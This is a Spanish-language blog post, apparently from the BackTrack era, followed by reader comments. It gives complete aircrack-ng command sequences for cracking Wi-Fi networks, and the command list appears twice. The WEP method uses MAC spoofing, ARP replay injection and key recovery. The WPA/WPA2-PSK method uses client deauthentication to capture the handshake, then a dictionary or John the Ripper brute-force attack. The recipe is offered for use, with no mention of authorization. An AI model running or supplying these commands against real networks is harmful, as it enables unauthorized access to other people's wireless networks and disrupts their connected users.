Seguridad Wireless
1. WEP`s [ARP request replay attack]:
NOTA: En todos los casos reemplazar:
XXXX: Interface
ZZZZ: Canal
YYYY: MAC BSSID
RRR: ESSID
1.1. Cambiar la MAC:
A. airmon-ng (Ver la interface que usamos)
B. airmon-ng stop XXXX (Detenemos el modo monitor)
C. ifconfig XXXX down (Tiramos nuestra interface)
D. macchanger --mac 00:11:22:33:44:55 XXXX (Cambiamos nuestra MAC, en este caso sera 00:11:22:33:44:55)
E. airmon-ng start XXXX (Volvemos a iniciar el modo monitor)
1.2. Buscar Redes:
F. airodump-ng XXXX ( Scannea Redes)
G. CTRL + C (Detiene el scanneo)
H. airodump-ng -c ZZZZ -w datas --bssid YYYY XXXX (Capturamos IVs) [No cerrar consola]
1.3. Asociandonos a la red (En otra consola):
I. aireplay-ng -1 0 -a YYYY -h 00:11:22:33:44:55 -e RRR XXXX (Asociacion con la red)
1.4 Inyectando Trafico:
J. aireplay-ng -3 -b YYYY -h 00:11:22:33:44:55 XXXX (Captura Datas a mas velocidad)
1.5. Desencriptando la Clave (En otra consola):
K. aircrack-ng datas-01.cap (Desencripta la clave con Aircrack)
2. WPA/WPA2/PSK:
NOTA: En todos los casos reemplazar:
XXXX: Interface
ZZZZ: Canal
YYYY: MAC BSSID
RRR: Interface modo monitor
TTTT: Station
2.1. Colocar la interface en modo monitor
A. aimon-ng (Saber nuestra Interface)
B. airmon-ng start XXXX (Colocamos en modo monitor nuestra Interface)
2.2. Capturando el Handshake:
C. airodump-ng RRR (Scannea redes)
D. CTRL + C (Frena el scanneo)
E. airodump-ng RRR --channel 1 --bssid YYYY -w /tmp/wpa2 (Guardara los *.cap en el directorio que le indicamos)
F. aireplay-ng -0 1 -a YYYY -c TTTT RRR(Comenzara la captura del Handshake)
2.3 Obteniendo la Clave:
G.1. aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b YYYY /tmp/wpa2*.cap (Saca la Pass por Diccionario)
G.2. /pentest/passwords/jtr/john --stdout --incremental:all | aircrack-ng -b YYYY -w - /tmp/wpa2*.cap (Saca la Pass por Fuerza Bruta con John The Ripper)
Crackear WEP´s - WPA/WPA2/PSK [Resumen de Codigos]

NOTA: En todos los casos reemplazar:
XXXX: Interface
ZZZZ: Canal
YYYY: MAC BSSID
RRR: ESSID
1.1. Cambiar la MAC:
A. airmon-ng (Ver la interface que usamos)
B. airmon-ng stop XXXX (Detenemos el modo monitor)
C. ifconfig XXXX down (Tiramos nuestra interface)
D. macchanger --mac 00:11:22:33:44:55 XXXX (Cambiamos nuestra MAC, en este caso sera 00:11:22:33:44:55)
E. airmon-ng start XXXX (Volvemos a iniciar el modo monitor)
1.2. Buscar Redes:
F. airodump-ng XXXX ( Scannea Redes)
G. CTRL + C (Detiene el scanneo)
H. airodump-ng -c ZZZZ -w datas --bssid YYYY XXXX (Capturamos IVs) [No cerrar consola]
1.3. Asociandonos a la red (En otra consola):
I. aireplay-ng -1 0 -a YYYY -h 00:11:22:33:44:55 -e RRR XXXX (Asociacion con la red)
1.4 Inyectando Trafico:
J. aireplay-ng -3 -b YYYY -h 00:11:22:33:44:55 XXXX (Captura Datas a mas velocidad)
1.5. Desencriptando la Clave (En otra consola):
K. aircrack-ng datas-01.cap (Desencripta la clave con Aircrack)
2. WPA/WPA2/PSK:
NOTA: En todos los casos reemplazar:
XXXX: Interface
ZZZZ: Canal
YYYY: MAC BSSID
RRR: Interface modo monitor
TTTT: Station
2.1. Colocar la interface en modo monitor
A. aimon-ng (Saber nuestra Interface)
B. airmon-ng start XXXX (Colocamos en modo monitor nuestra Interface)
2.2. Capturando el Handshake:
C. airodump-ng RRR (Scannea redes)
D. CTRL + C (Frena el scanneo)
E. airodump-ng RRR --channel 1 --bssid YYYY -w /tmp/wpa2 (Guardara los *.cap en el directorio que le indicamos)
F. aireplay-ng -0 1 -a YYYY -c TTTT RRR(Comenzara la captura del Handshake)
2.3 Obteniendo la Clave:
G.1. aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b YYYY /tmp/wpa2*.cap (Saca la Pass por Diccionario)
G.2. /pentest/passwords/jtr/john --stdout --incremental:all | aircrack-ng -b YYYY -w - /tmp/wpa2*.cap (Saca la Pass por Fuerza Bruta con John The Ripper)
we vos sos un capo en esto pero si no seria mucho molestar me podes decir cual es el programa para ejecutar esos parametros ? me parece que es aircrack no ?
ResponderEliminarAnonimo Si es aircrak de Linux, Eres un Master ANTRAX Espero Igualarte algun dia xD.
ResponderEliminarJohn no responde cuando lo pongo. Y si, he escrito todo bien y e mirado en otros sitios y pone lo mismo. Pero no va.
ResponderEliminarGracias.
Depende la version de backtrack que estas usando, es el nombre del path que debes poner. Que version de bt usas?
EliminarParcero Debes poner la fuente de donde sacastes la información, HackxTrack - Wirelles cracking desde cero con Backtrack, Hay esta super explicado, y es un trabajo muy extenso para que no compartas el Autor. Ten eso en cuenta... (-_-).: Ustorms .:(-_-).
ResponderEliminarHi man, no se que es HackxTrack, quizas quisiste decir HackxCrack y el autor soy yo, ya que yo fui admin de ese foro y yo lo postie ahi.
EliminarSaludos
Hola Antrax, tu post de hecho me ha servido a la primera ( Me refiero al libro de hack x crack)pero andaba en busca una duda y bueno acabe aqui, y me gusto mas aqui porque encontre la respuesta que necesitaba ya que los datos estan (para mi) mas claros y actualizados para BT 5
ResponderEliminarSaludos!!
Muy buen post y blog. Me gusta mucho, pero tengo alguna pequeña pregunta: ¿para qué nos sirve usar John The Ripper? ¿Es una herramienta que prueba todas las contraseñas habidas y por haber? ¿O "solo" es un super diccionario? ¿Qué es? ¿Con esto deberia sacar la contraseña seguro? Es que lo he probado con el diccionario y no lo he conseguido, ¿lo amplío?
ResponderEliminarEspero alguna respuesta, por favor. Gracias.